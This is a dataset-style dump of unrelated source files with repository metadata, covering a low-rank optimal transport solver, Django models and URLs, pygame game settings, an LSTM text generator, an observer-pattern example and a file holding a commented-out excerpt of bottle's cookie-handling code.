        C = cost_factorized(X, Y)
        if len(C) == 2:
            C1, C2 = C
        else:
            print("Error: cost not adapted")
            return "Error"
    else:
        C1, C2 = cost_factorized
    n, d = np.shape(C1)
    ########### Initialization ###########
    ## Init with K-means
    if Init == "kmeans":
        # NOTE: KMeans and UpdatePlans are defined/imported elsewhere in this
        # module (presumably sklearn.cluster.KMeans -- confirm).
        g = np.ones(rank) / rank
        kmeans = KMeans(n_clusters=rank, random_state=0).fit(X)
        Z = kmeans.cluster_centers_
        # NOTE(review): UpdatePlans is unpacked into 4 values here but into 3
        # in Quad_LOT_MD -- one of the two call sites is likely out of date;
        # confirm against the definition of UpdatePlans.
        gamma1, gamma2, g, count_op_Barycenter = UpdatePlans(
            X,
            Y,
            Z,
            a,
            b,
            reg_init,
            cost,
            max_iter=max_iter_IBP,
            delta=delta_IBP,
            lam=lam_IBP,
        )
        Q, R = gamma1.T, gamma2.T
    ## Init random
    if Init == "random":
        np.random.seed(seed_init)
        g = np.abs(np.random.randn(rank))
        g = g + 1
        g = g / np.sum(g)
        n, d = np.shape(X)
        m, d = np.shape(Y)
        seed_init = seed_init + 1000
        np.random.seed(seed_init)
        Q = np.abs(np.random.randn(n, rank))
        Q = Q + 1
        Q = (Q.T * (a / np.sum(Q, axis=1))).T
        seed_init = seed_init + 1000
        np.random.seed(seed_init)
        R = np.abs(np.random.randn(m, rank))
        R = R + 1
        R = (R.T * (b / np.sum(R, axis=1))).T
    ## Init trivial
    if Init == "trivial":
        # Rank-2 mixture of deterministic marginals, feasible by construction.
        g = np.ones(rank) / rank
        lambda_1 = min(np.min(a), np.min(g), np.min(b)) / 2
        a1 = np.arange(1, np.shape(a)[0] + 1)
        a1 = a1 / np.sum(a1)
        a2 = (a - lambda_1 * a1) / (1 - lambda_1)
        b1 = np.arange(1, np.shape(b)[0] + 1)
        b1 = b1 / np.sum(b1)
        b2 = (b - lambda_1 * b1) / (1 - lambda_1)
        g1 = np.arange(1, rank + 1)
        g1 = g1 / np.sum(g1)
        g2 = (g - lambda_1 * g1) / (1 - lambda_1)
        Q = lambda_1 * np.dot(a1[:, None], g1.reshape(1, -1)) + (1 - lambda_1) * np.dot(
            a2[:, None], g2.reshape(1, -1)
        )
        R = lambda_1 * np.dot(b1[:, None], g1.reshape(1, -1)) + (1 - lambda_1) * np.dot(
            b2[:, None], g2.reshape(1, -1)
        )
    #####################################
    # Step-size selection.
    if gamma_init == "theory":
        # NOTE(review): np.linalg.norm(C1) appears twice in both terms; should
        # the second factor be np.linalg.norm(C2)? Compare Quad_LOT_MD, which
        # uses the norm of the full cost. Confirm against the paper.
        L_trans = (
            (2 / (alpha) ** 4) * (np.linalg.norm(C1) ** 2) * (np.linalg.norm(C1) ** 2)
        )
        L_trans = (
            L_trans
            + ((reg + 2 * np.linalg.norm(C1) * np.linalg.norm(C1)) / (alpha ** 3)) ** 2
        )
        L = np.sqrt(3 * L_trans)
        gamma = 1 / L
        # NOTE(review): debug print left in?
        print(gamma)
    if gamma_init == "regularization":
        gamma = 1 / reg
    if gamma_init == "arbitrary":
        gamma = gamma_0
    err = 1
    niter = 0
    while niter < max_iter:
        Q_prev = Q
        R_prev = R
        g_prev = g
        if err > delta:
            niter = niter + 1
            # Gradient of the objective at (Q, R, g), computed through the
            # factorization C = C1 @ C2 (never materializing C).
            K1_trans_0 = np.dot(C2, R)  # d * m * r
            K1_trans_0 = np.dot(C1, K1_trans_0)  # n * d * r
            C1_trans = K1_trans_0 / g + (reg - (1 / gamma)) * np.log(Q)  # 3 * n * r
            K2_trans_0 = np.dot(C1.T, Q)  # d * n * r
            K2_trans_0 = np.dot(C2.T, K2_trans_0)  # m * d * r
            C2_trans = K2_trans_0 / g + (reg - (1 / gamma)) * np.log(R)  # 3 * m * r
            omega = np.diag(np.dot(Q.T, K1_trans_0))  # r * n * r
            C3_trans = (omega / (g ** 2)) - (reg - (1 / gamma)) * np.log(g)  # 4 * r
            # Update the coupling
            if method == "IBP":
                K1 = np.exp((-gamma) * C1_trans)
                K2 = np.exp((-gamma) * C2_trans)
                K3 = np.exp(gamma * C3_trans)
                Q, R, g = LR_IBP_Sin(
                    K1,
                    K2,
                    K3,
                    a,
                    b,
                    max_iter=max_iter_IBP,
                    delta=delta_IBP,
                    lam=lam_IBP,
                )
            if method == "Dykstra":
                K1 = np.exp((-gamma) * C1_trans)
                K2 = np.exp((-gamma) * C2_trans)
                K3 = np.exp(gamma * C3_trans)
                Q, R, g = LR_Dykstra_Sin(
                    K1,
                    K2,
                    K3,
                    a,
                    b,
                    alpha,
                    max_iter=max_iter_IBP,
                    delta=delta_IBP,
                    lam=lam_IBP,
                )
            if method == "Dykstra_LSE":
                # Log-domain solver takes the costs directly (no exp).
                Q, R, g = LR_Dykstra_LSE_Sin(
                    C1_trans,
                    C2_trans,
                    C3_trans,
                    a,
                    b,
                    alpha,
                    gamma,
                    max_iter=max_iter_IBP,
                    delta=delta_IBP,
                    lam=lam_IBP,
                )
            # Update the total cost
            # Metric used in the MIT paper: useless
            # OT_trans = compute_SE_OT(X,Y,Q,R,g)
            # Classical OT cost: <Q, C1 C2 R diag(1/g)>
            C_trans = np.dot(C2, R)
            C_trans = np.dot(C1, C_trans)
            C_trans = C_trans / g
            G = np.dot(Q.T, C_trans)
            OT_trans = np.trace(G)
            if niter > 10:
                ## Update the error: theoretical error
                # err_1 = ((1/gamma)**2) * (KL(Q,Q_prev) + KL(Q_prev,Q))
                # err_2 = ((1/gamma)**2) * (KL(R,R_prev) + KL(R_prev,R))
                # err_3 = ((1/gamma)**2) * (KL(g,g_prev) + KL(g_prev,g))
                # err = err_1 + err_2 + err_3
                ## Update the error: practical (relative) error
                err = np.abs(OT_trans - acc[-1]) / acc[-1]
                if np.isnan(err):
                    print("Error computation of the stopping criterion", niter)
                    Q = Q_prev
                    R = R_prev
                    g = g_prev
                    break
            if np.isnan(OT_trans) == True:
                print("Error: NaN OT value")
                return "Error"
            else:
                acc.append(OT_trans)
                end = time.time()
                tim_actual = end - start
                times.append(end - start)
                # Wall-clock budget exhausted: return the current state.
                if tim_actual > time_out:
                    return (
                        acc[-1],
                        np.array(acc),
                        np.array(times),
                        Q,
                        R,
                        g,
                    )
        else:
            # err <= delta: converged.
            return (
                acc[-1],
                np.array(acc),
                np.array(times),
                Q,
                R,
                g,
            )
    return acc[-1], np.array(acc), np.array(times), Q, R, g
#################### Cost Matrix #####################
def Square_Euclidean_Distance(X, Y):
    """Return the pairwise squared Euclidean distance matrix.

    Entry (i, j) equals ||X[i] - Y[j]||^2 for X of shape (n, d) and Y of
    shape (m, d); the result has shape (n, m).
    """
    pair_diff = X[:, np.newaxis] - Y[np.newaxis, :]
    return np.sum(pair_diff ** 2, 2)
# shape of xs: num_samples * dimension
def factorized_square_Euclidean(xs, xt):
    """Exact rank-(d+2) factorization of the squared Euclidean cost matrix.

    Uses the expansion |x - y|^2 = |x|^2 + |y|^2 - 2 <x, y> to return
    A_1 (n x (d+2)) and A_2 ((d+2) x m) such that A_1 @ A_2 equals the
    full squared-distance matrix between xs (n x d) and xt (m x d).
    """
    n, d = np.shape(xs)
    m = np.shape(xt)[0]
    A_1 = np.zeros((n, d + 2))
    A_1[:, 0] = np.sum(xs ** 2, axis=1)  # |x|^2 term
    A_1[:, 1] = np.ones(n)
    A_1[:, 2:] = -2 * xs  # inner-product term
    A_2 = np.zeros((d + 2, m))
    A_2[0, :] = np.ones(m)
    A_2[1, :] = np.sum(xt ** 2, axis=1)  # |y|^2 term
    A_2[2:, :] = xt.T
    return A_1, A_2
def Euclidean_Distance(X, Y):
    """Return the pairwise Euclidean distance matrix |x_i - y_j|."""
    squared = np.sum((X[:, np.newaxis] - Y[np.newaxis, :]) ** 2, 2)
    return np.sqrt(squared)
def Lp_Distance(X, Y, p=1):
    """Return the pairwise L_p distance matrix (sum_k |x_k - y_k|^p)^(1/p)."""
    abs_diff = np.abs(X[:, np.newaxis] - Y[np.newaxis, :])
    return np.sum(abs_diff ** p, 2) ** (1 / p)
def Learning_linear_subspace(X, Y, cost, U, C_init=False, tol=1e-3):
    """Learn the left factor V such that V @ U approximates the cost matrix.

    Given a right factor U (rank x m), samples int(rank / tol) columns of
    the cost matrix uniformly at random and solves a least-squares problem
    in the row space of U to recover V (n x rank).

    Parameters
    ----------
    X, Y : point clouds (used only when C_init is False).
    cost : cost function (C_init False) or precomputed cost matrix.
    U : (rank, m) right factor.
    C_init : whether `cost` is a precomputed matrix.
    tol : controls the number of sampled columns, int(rank / tol).

    Returns
    -------
    V_f : (n, rank) left factor.
    """
    rank, m = np.shape(U)
    U_sym = np.dot(U, U.T)  # k x k
    d, v = np.linalg.eigh(U_sym)
    # NOTE(review): assumes U has full row rank so every eigenvalue in d is
    # strictly positive; a zero eigenvalue would make this division blow up.
    v = v / np.sqrt(d)  # k x k
    # Uniformly sampled column indices of the cost matrix.
    ind_column = np.random.choice(m, size=int(rank / tol))
    U_trans = U[:, ind_column]  # k x k/tol
    if C_init == False:
        A_trans = cost(X, Y[ind_column, :])
    else:
        A_trans = cost[:, ind_column]  # n x k/tol
    A_trans = (1 / np.sqrt(int(rank / tol))) * A_trans
    B = (1 / np.sqrt(int(rank / tol))) * np.dot(v.T, U_trans)  # k x k/tol
    # Normal equations: alpha = (B B^T)^{-1} B A^T.
    Mat = np.linalg.inv(np.dot(B, B.T))
    Mat = np.dot(Mat, B)  # k x k/tol
    alpha = np.dot(Mat, A_trans.T)  # k x n
    V_f = np.dot(alpha.T, v.T)
    return V_f
# If C_init == True: cost is the Matrix
# If C_init == False: cost is the Function
def factorized_distance_cost(X, Y, rank, cost, C_init=False, tol=1e-3, seed=49):
    """Randomized low-rank factorization of a distance/cost matrix.

    Samples rows and then columns of the cost matrix with probabilities
    proportional to (squared) magnitudes, builds a small sketch W, extracts
    its top-`rank` left singular subspace, and recovers the factors by
    least squares (via Learning_linear_subspace).

    Parameters
    ----------
    X, Y : point clouds (used only when C_init is False).
    rank : target rank of the factorization.
    cost : cost function (C_init False) or precomputed (n, m) cost matrix.
    C_init : whether `cost` is a precomputed matrix.
    tol : controls the sketch size, int(rank / tol) sampled rows/columns.
    seed : RNG seed for all the sampling below.

    Returns
    -------
    V : (n, rank) and U_T : (rank, m) with V @ U_T approximating the cost.
    """
    np.random.seed(seed)
    if C_init == False:
        n, m = np.shape(X)[0], np.shape(Y)[0]
    else:
        n, m = np.shape(cost)
    # One random row i_ and column j_ used to estimate row-sampling weights.
    i_ = np.random.randint(n, size=1)
    j_ = np.random.randint(m, size=1)
    if C_init == False:
        X_trans = X[i_, :].reshape(1, -1)
        cost_trans_i = cost(X_trans, Y)
        mean = np.mean(cost_trans_i ** 2)
    else:
        cost_trans_i = cost[i_, :]
        mean = np.mean(cost_trans_i ** 2)
    if C_init == False:
        Y_trans = Y[j_, :].reshape(1, -1)
        cost_trans_j = cost(X, Y_trans)
    else:
        cost_trans_j = cost[:, j_]
    # Row-sampling probabilities, proportional to estimated row energies.
    p_row = cost_trans_j ** 2 + cost_trans_i[0, j_] ** 2 + mean
    p_row = p_row / np.sum(p_row)  # vector of size n
    # Compute S: importance-weighted row sketch of the cost matrix.
    ind_row = np.random.choice(n, size=int(rank / tol), p=p_row.reshape(-1))
    if C_init == False:
        S = cost(X[ind_row, :], Y)  # k/tol x m
    else:
        S = cost[ind_row, :]
    p_row_sub = p_row[ind_row]
    S = S / np.sqrt(int(rank / tol) * p_row_sub)
    norm_square_S = np.sum(S ** 2)
    # Column-sampling probabilities, proportional to column energies of S.
    p_column = np.zeros(m)
    for j in range(m):
        p_column[j] = np.sum(S[:, j] ** 2) / norm_square_S
    # p_column = p_column / np.sum(p_column) # vector of size m
    # Compute W: column sketch of S.
    ind_column = np.random.choice(m, size=int(rank / tol), p=p_column.reshape(-1))
    W = S[:, ind_column]  # k/tol x k/tol
    p_column_sub = p_column[ind_column]
    W = (W.T / np.sqrt(int(rank / tol) * p_column_sub)).T
    # Compute U: top-`rank` left singular directions of W, lifted back to
    # the full column space through S and normalized.
    u, d, v = np.linalg.svd(W)
    U = u[:, :rank]  # k/tol x k
    U_trans = np.dot(W.T, U)  # k/tol x k
    norm_U = np.sum(U_trans ** 2, axis=0)
    norm_U = np.sqrt(norm_U)
    U = np.dot(S.T, U)  # m x k
    U = U / norm_U
    # Compute V: least-squares fit of the left factor.
    V = Learning_linear_subspace(X, Y, cost, U.T, C_init=C_init, tol=tol)
    return V, U.T
# Approximate the kernel k(x,y) = exp(TU/\varepsilon)
def RF_Approx(T, U, reg, num_samples=100, seed=49):
    """Random-feature approximation of the kernel k(x, y) = exp(<x, y> / reg).

    Builds positive feature maps A (for the rows of T) and B (for the rows
    of U.T) such that A @ B approximates exp(T @ U / reg).

    Parameters
    ----------
    T : (n, d) array of left points.
    U : (d, m) array; its transpose holds the right points.
    reg : kernel regularization (temperature) epsilon.
    num_samples : number of random features.
    seed : RNG seed shared by both feature maps (required so that both sides
        use the same random frequencies).

    Returns
    -------
    A : (n, num_samples) feature matrix.
    B : (num_samples, m) feature matrix.
    """
    # Radius bounding the point norms; capped at 100 to keep the feature map
    # numerically stable.
    R = np.minimum(theoritical_R(T, U.T), 100)
    A = Feature_Map_Gaussian(T, reg, R, num_samples=num_samples, seed=seed)
    B = Feature_Map_Gaussian(U.T, reg, R, num_samples=num_samples, seed=seed).T
    # Cleanup: the original computed (and discarded) the shapes of T and U.T
    # here; those locals were dead code and have been removed.
    return A, B
def theoritical_R(X, Y):
    """Return the largest Euclidean row norm over both point clouds X and Y."""
    max_norm_X = np.max(np.linalg.norm(X, axis=1))
    max_norm_Y = np.max(np.linalg.norm(Y, axis=1))
    return np.maximum(max_norm_X, max_norm_Y)
## Feature map of k(x,y) = exp(\langle x,y\rangle/\varepsilon) ##
def Feature_Map_Gaussian(X, reg, R, num_samples=100, seed=49, tresh=700):
    """Positive random feature map for the kernel k(x, y) = exp(<x, y> / reg).

    Draws `num_samples` Gaussian frequencies and evaluates a feature map
    whose Gram matrix approximates exp(X X'^T / reg) for points of norm at
    most R. Log-features are clipped at `tresh` before exponentiation to
    avoid overflow.
    """
    n, d = np.shape(X)
    # Variance parameter q = exp(W(y)) / 2, with W the Lambert function and
    # y = R^2 / (2 * reg * d).
    y = R ** 2 / (2 * reg * d)
    q = np.real((1 / 2) * np.exp(special.lambertw(y)))
    C = (2 * q) ** (d / 4)
    var = (q * reg) / 2
    np.random.seed(seed)
    U = np.random.multivariate_normal(np.zeros(d), var * np.eye(d), num_samples)
    # Pairwise squared distances between data points and sampled frequencies
    # (inlined squared-Euclidean computation).
    squared_dist = np.sum((X[:, np.newaxis] - U[np.newaxis, :]) ** 2, 2)
    log_feat = -squared_dist / reg  # n x num_samples
    log_feat = log_feat + np.sum(U ** 2, axis=1) / (2 * reg * q)
    log_feat = (log_feat.T + np.sum(X ** 2, axis=1) / (2 * reg)).T
    log_feat = np.minimum(log_feat, tresh)
    return C * np.exp(log_feat) * (1 / np.sqrt(num_samples))
# Uniform Random Nyström
# Here we approximate the SDP matrix exp(XX.T/\varepsilon)
def Nys_approx(X, Y, reg, rank, seed=49, stable=1e-10):
    """Uniform-sampling Nystrom approximation of the kernel exp(Z Z^T / reg).

    Stacks X and Y into Z, draws min(rank, n + m) landmark rows uniformly
    without replacement, and returns the Nystrom factors:

    A : (k, k) kernel restricted to the landmarks, with `stable` added on
        the diagonal for invertibility.
    V : (n + m, k) cross-kernel between all points and the landmarks.
    """
    points = np.concatenate((X, Y), axis=0)
    total = np.shape(X)[0] + np.shape(Y)[0]
    n_landmarks = int(np.minimum(rank, total))
    np.random.seed(seed)
    landmarks = np.sort(np.random.choice(total, n_landmarks, replace=False))
    anchors = points[landmarks, :]
    A = np.exp(np.dot(anchors, anchors.T) / reg) + stable * np.eye(n_landmarks)
    V = np.exp(np.dot(points, anchors.T) / reg)
    return A, V
| [
"mscetbon@ens-paris-saclay.fr"
] | mscetbon@ens-paris-saclay.fr |
f89dbf512849258484575327a254d71329f70ec0 | fe5d970498e3b5a31178f5df72fa02d6c5add884 | /Lab_2/taks1/Domain/Drone/__init__.py | 92365fb7a14f8e1bbe3c986fbb886738d7a597ec | [] | no_license | AndreiZavo/Artificial-Intelligence | ca045c77bbcb6ad2d50f3e80a55f9117888bd450 | 40444f23a13fb5226e5a79293eb4624aee946cbf | refs/heads/main | 2023-04-01T21:56:33.053913 | 2021-04-10T17:52:04 | 2021-04-10T17:52:04 | 347,122,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21 | py | from .Drone import *
| [
"andrei_lucian01@yahoo.com"
] | andrei_lucian01@yahoo.com |
7d694881d590f7fe45d3be9f6d9c0c180d407993 | 0049d7959ff872e2ddf6ea3ce83b6c26512425a6 | /django_demo_applications/djangoprojectsot/modelinheritanceproject/testapp/models.py | 2ba2ba663d87e53e60132476cad2e672ab93660a | [] | no_license | srazor09/Django_projects | 9806ab25d966af780cdabe652a1792220c7806a8 | 8d664ba4c9478bd93c8e5bcbcaf594e8ffe6ce93 | refs/heads/master | 2023-04-18T02:13:15.993393 | 2021-05-04T20:34:05 | 2021-05-04T20:34:05 | 364,379,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from django.db import models
# Create your models here.
# class ContactInfo1(models.Model):
# name=models.CharField(max_length=64)
# email=models.EmailField()
# address=models.CharField(max_length=264)
#
# class Student1(ContactInfo1):
# rollno=models.IntegerField()
# marks=models.IntegerField()
#
# class Teacher1(ContactInfo1):
# subject=models.CharField(max_length=264)
# salary=models.FloatField()
class BasicModel(models.Model):
f1=models.CharField(max_length=64)
f2=models.CharField(max_length=64)
f3=models.CharField(max_length=64)
class StandardModel(BasicModel):
f4=models.CharField(max_length=64)
f5=models.CharField(max_length=64)
| [
"sourabhaws09@gmail.com"
] | sourabhaws09@gmail.com |
5b84d20e2ac52bc2051118bcec24336ace41a489 | 9ce64348ece747953cbd85a91ca95deb2e7f45ad | /events/urls.py | bb928607ecd2b1543c722c2bf2865314205c8fcb | [] | no_license | julianrofrano-eb/todo-list | 521a29808e8c0c05f478ba9b77aa382211a9bbfb | 06be26b0808da0806def4a131922d0ce8ffa953c | refs/heads/master | 2023-01-11T19:37:21.784433 | 2019-09-04T14:52:18 | 2019-09-04T14:52:18 | 206,325,749 | 0 | 0 | null | 2023-01-04T08:56:56 | 2019-09-04T13:27:51 | JavaScript | UTF-8 | Python | false | false | 723 | py | from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
from . import views
urlpatterns = [
url('(?P<event_id>[0-9]+)/task/complete/(?P<pk>[0-9]+)/$', views.complete_task, name='task-complete'),
url('(?P<event_id>[0-9]+)/task/delete/(?P<pk>[0-9]+)/$', views.TaskDelete.as_view(), name='task-delete'),
url('(?P<event_id>[0-9]+)/task/update/(?P<pk>[0-9]+)/$', views.TaskUpdate.as_view(), name='task-update'),
url('(?P<event_id>[0-9]+)/task/create/', views.EventTaskCreate.as_view(), name='task-create-event'),
url('(?P<event_id>[0-9]+)/tasks/', views.ListTasksEvent.as_view(), name='list-tasks-event'),
url('', views.ListEvents.as_view(), name='event-list'),
]
| [
"julian.rofrano@julian.rofrano-07322"
] | julian.rofrano@julian.rofrano-07322 |
0790ec119fc1b814c8df24850e63b50d09c127ef | b3d28cc90fb2fbb3efe177c6ee5ac6077175c79f | /settings.py | 2e833405aef60e6d0673de39b2568ed9a5ef71f6 | [] | no_license | DiviLOL/Zobmie-shooter | b7a708312be3d75d163c44a9280ee11644f487d7 | 1aa4c844cd06d169b8a251f5da4a2302e7eb2381 | refs/heads/main | 2023-08-24T09:13:31.339750 | 2021-10-06T10:10:40 | 2021-10-06T10:10:40 | 414,154,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,863 | py | import pygame as py
import random
vec = py.math.Vector2
# define some colors (R, G, B)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
DARKGREY = (40, 40, 40)
LIGHTGREY = (100, 100, 100)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
BROWN = (106,55,5)
# game settings
WIDTH = 1376 # or 1,376
HEIGHT = 100 * 9 # or 900
FPS = 60
TITLE = "Tilemap Demo"
BGCOLOR = BROWN
TILESIZE = 64
GRIDWIDTH = WIDTH / TILESIZE
GRIDHEIGHT = HEIGHT / TILESIZE
# player settings
PLAYER_HEALTH = 100
PLAYER_HIT_RECT = py.Rect(0, 0, 64, 64)
PLAYER_ENERY = 100
PLAYERSPEED = 200
PLAYER_ROT_SPEED = 180
PLAYER_IMG = 'survivor1_gun.png'
# Effects
ALPHA_DAMAGE = [i for i in range(0,255,35)]
NIGHT_COLOR = (25,25,25)
LIGHT_RADIUS = (600,600)
LIGHT_MASK = 'light_350_med.png'
MUZZLE_FLASHES = ['whitePuff15.png','whitePuff16.png','whitePuff17.png','whitePuff18.png']
# bullet settings
BULLET_IMG = 'bullet_tile.png'
WEOPENS = {}
WEOPENS['pistol'] = {'bullet_speed' : 500,
'bullet_lifetime' : 1000,
'rate' : 250,
'kickback' : 200,
'damage' : 20,
'spread' : 5,
'bullet_size' : 'lg',
'bullet_count' : 1
}
WEOPENS['shotgun'] = {'bullet_speed' : 500,
'bullet_lifetime' : 2000,
'rate' : 900,
'kickback' : 300,
'damage' : 50,
'spread' : 20,
'bullet_size' : 'sm',
'bullet_count' : 2
}
BULLET_OFFSET = vec(30 , 10)
# mob settings
ZOMBIE_IMG = 'zoimbie1_hold.png'
ZOMBIE_SPEED = [100,132,98,110,160]
MOB_HIT_RECT = py.Rect(0,0,35,43)
MOB_KNOCKBACK = 40
AVOID_RADIUS = 80
# bobbing motion settings
BOB_RANGE = 20
BOB_SPEED = 0.6
# hope you like it | [
"88365505+DiviLOL@users.noreply.github.com"
] | 88365505+DiviLOL@users.noreply.github.com |
13458787d9118c6413743360eea1fd4dd2d6ab97 | f130171785cf702c695dfd58b05e7afe84b15847 | /firecrest/api.py | 9e944b3c424d53d50ebd283aac2c98f36f979f3d | [] | no_license | Corwinpro/firecrest | 019ab9e983d6d3faa7b3642a0f94c2662be67db1 | 4b6cb4b57c55f0cbd2d0c59c4729e7548a668a67 | refs/heads/master | 2021-12-25T14:16:44.675636 | 2021-12-19T15:28:08 | 2021-12-19T15:28:08 | 174,002,822 | 0 | 0 | null | 2021-12-19T15:28:08 | 2019-03-05T18:53:17 | Python | UTF-8 | Python | false | false | 803 | py | """
Core API for the firecrest package.
This module represents the public API of the firecrest library.
It contains everything you should need as a user of the library.
No stability guarantees are made for imports from other modules or subpackages.
"""
from firecrest.mesh.boundaryelement import BSplineElement, LineElement
from firecrest.mesh.geometry import SimpleDomain
from firecrest.solvers.eigenvalue_tv_acoustic_solver import EigenvalueTVAcousticSolver
from firecrest.solvers.spectral_tv_acoustic_solver import SpectralTVAcousticSolver
from firecrest.solvers.unsteady_tv_acoustic_solver import UnsteadyTVAcousticSolver
__all__ = [
"BSplineElement",
"LineElement",
"SimpleDomain",
"EigenvalueTVAcousticSolver",
"SpectralTVAcousticSolver",
"UnsteadyTVAcousticSolver",
]
| [
"noreply@github.com"
] | Corwinpro.noreply@github.com |
8e69c3352dd01ab3c1ddd9e93e9305d5063b68ed | 1f21a6c258dc1ef79ffbb985ee8af21cdd51db40 | /generating.py | 5fa7d39794640b4af5d6a46c8e0b492adc343610 | [] | no_license | sem980/mtg_like_textgen_lstm | 858fc9d80421d036965c5a676e1d9e647276b441 | 0fadbd5b31d49587451b2fc89385271a1e7f8c2f | refs/heads/master | 2020-04-30T03:20:14.002734 | 2019-03-21T13:18:23 | 2019-03-21T13:18:23 | 176,582,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,797 | py | # -*- encoding: utf-8 -*-
from keras.models import load_model
from MorphTable import MorphTable
import numpy as np
import json
import sys
import warnings
def passing_warn(*args,**kwargs):
pass
def lottery(y_pred):
#次に予測される形態素の確率が与えられた際に抽選を行う関数
#多項分布で抽選を行い,np.argmaxでインデックスを返す
pred_f64 = np.asarray(y_pred).astype('float64')
pred_norm = pred_f64/sum(pred_f64)
hit_index = np.argmax(np.random.multinomial(1,pred_norm,1))
return hit_index
def seed_gen(filename):
#テキスト生成の際の最初の一形態素をランダムに出力
with open(filename,'r') as f:
seeds = json.load(f)
return np.random.choice(seeds)
def generate_text(model,seed_morph,morph_table,maxlen=5,eps=0.1):
#文頭の形態素seed_morphからmorph_tableに基づくインデックスのリストを作成
seed_seq = ['<BOS>']*(maxlen-1)+[seed_morph]
seq_index = [morph_table.morph2index(m) for m in seed_seq]
#テキストの生成
#<EOS>か形態素200個が出力されるまでテキストを生成
generate_list = list()
n = 0
next_morph = ''
while(n<200 and next_morph != '<EOS>'):
#学習済みモデルへの入力となるx_predはseq_indexのOne-Hot表現
x_pred = np.zeros((1,maxlen,morph_table.ret_typenum()),dtype=np.bool)
for i,morph_index in enumerate(seq_index):
x_pred[0,i,morph_index] = 1
#x_predに基づき次の形態素を予測する確率y_predを取得
y_pred = model.predict(x_pred,verbose=0)[0]
#ランダムに得られたeps_choiceがeps以下の値であれば抽選
#以上であれば最大の確率となる形態素を取得
eps_choice = np.random.random()
hit = np.argmax(y_pred) if eps_choice > eps else lottery(y_pred)
next_morph = morph_table.index2morph(hit)
#seq_indexの最初の形態素を捨て, 予測された形態素を最後に追加
seq_index.pop(0)
seq_index.append(hit)
generate_list.append(next_morph)
n+=1
return ''.join(seed_seq[-1:]+generate_list[:-1])
def main():
warnings.warn = passing_warn
model = load_model('model/morphlevel_model.h5')
#形態素とインデックスの変換用テーブル
morph_table = MorphTable('data/vocab.json')
# 1sequenceの形態素数
maxlen = 5
#epsの値によって予測時に抽選が行われる確率が変化
if len(sys.argv)>1:
eps = float(sys.argv[1])
else:
eps = 0.8
seed_morph = seed_gen('data/seed_morph.json')
gen = generate_text(model,seed_morph,morph_table,maxlen,eps)
print(gen)
if __name__ == '__main__':
main() | [
"heyhey1089@gmail.com"
] | heyhey1089@gmail.com |
2a8d31ce9ce3683a0d4c071feaf1b1488a845422 | 48dab42eeef7f971af1fe98045e669edb8e57ab0 | /behavioural/observer_pattern.py | 864f36310cf2de51d7e96f2ba31734a1eb35c03e | [
"MIT"
] | permissive | cosmos-sajal/python_design_patterns | b7df3e83e74ac5eccd30e8037ebc70987407ca2b | d270989f1dfafaef48e4b585eca91603a6c0ac8e | refs/heads/master | 2022-06-06T16:41:41.638518 | 2020-05-05T08:20:16 | 2020-05-05T08:20:16 | 260,250,022 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,112 | py | # Docs - https://deductionlearning.com/design-patterns/observer-pattern-introductory-example/
# https://www.youtube.com/watch?v=wiQdrH2YpT4&list=PLF206E906175C7E07&index=4
# https://www.quora.com/What-are-some-real-world-uses-of-observer-pattern
# difference between PubSub and Observer Pattern -
# https://hackernoon.com/observer-vs-pub-sub-pattern-50d3b27f838c
from abc import ABCMeta, abstractmethod
class Subject(metaclass=ABCMeta):
@abstractmethod
def register(self):
pass
@abstractmethod
def unRegister(self):
pass
@abstractmethod
def notify(self):
pass
class Observer(metaclass=ABCMeta):
@abstractmethod
def update(googlePrice, applePrice, ibmPrice):
pass
class StockObserver(Observer):
observerCounter = 0
def __init__(self, stockGrabber):
StockObserver.observerCounter += 1
self.observerId = StockObserver.observerCounter
stockGrabber.register(self)
def update(self, googlePrice, applePrice, ibmPrice):
print("observer id -" + str(self.observerId))
print("the prices are:" + str(googlePrice) +
" " + str(applePrice) + " " + str(ibmPrice))
class StockGrabber(Subject):
def __init__(self):
self.googlePrice = 0.0
self.applePrice = 0.0
self.ibmPrice = 0.0
self.observers = []
def register(self, o):
self.observers.append(o)
def unRegister(self, o):
self.observers.remove(o)
def notify(self):
for observer in self.observers:
observer.update(self.googlePrice, self.applePrice, self.ibmPrice)
def setGooglePrice(self, price):
self.googlePrice = price
self.notify()
def setApplePrice(self, price):
self.applePrice = price
self.notify()
def setIBMPrice(self, price):
self.ibmPrice = price
self.notify()
stockGrabber = StockGrabber()
observer1 = StockObserver(stockGrabber)
observer2 = StockObserver(stockGrabber)
stockGrabber.setGooglePrice(100.0)
stockGrabber.setApplePrice(200.0)
stockGrabber.setIBMPrice(300.0)
| [
"sajal.4591@gmail.com"
] | sajal.4591@gmail.com |
bd4c169910e6c1636360c87417b1e758cd7f99cb | 8335147b15c0d38873ac54f16048ef66579bf85f | /dox17.py | 6284011ca0410eb01de325b692ceb6723ff287ad | [] | no_license | Zeventeen-17/dox17 | 2204b0b3be472ac9210c5954a6d7ebf0d4a164ff | 4a458affb0ab18d204b5582117e6dc6193cb7a4f | refs/heads/main | 2023-08-29T00:47:26.000389 | 2021-10-01T20:08:08 | 2021-10-01T20:08:08 | 410,429,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,575 | py | #!/bin/python
import os
import time
'''
def fetr():
def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret:
# See BaseResponse.set_cookie for details on signed cookies.
if value and value.startswith('!') and '?' in value:
sig, msg = map(tob, value[1:].split('?', 1))
hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()
if _lscmp(sig, base64.b64encode(hash)):
dst = pickle.loads(base64.b64decode(msg))
if dst and dst[0] == key:
return dst[1]
return default
return value or default
@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
""" The :attr:`query_string` parsed into a :class:`FormsDict`. These
values are sometimes called "URL arguments" or "GET parameters", but
not to be confused with "URL wildcards" as they are provided by the
:class:`Router`. """
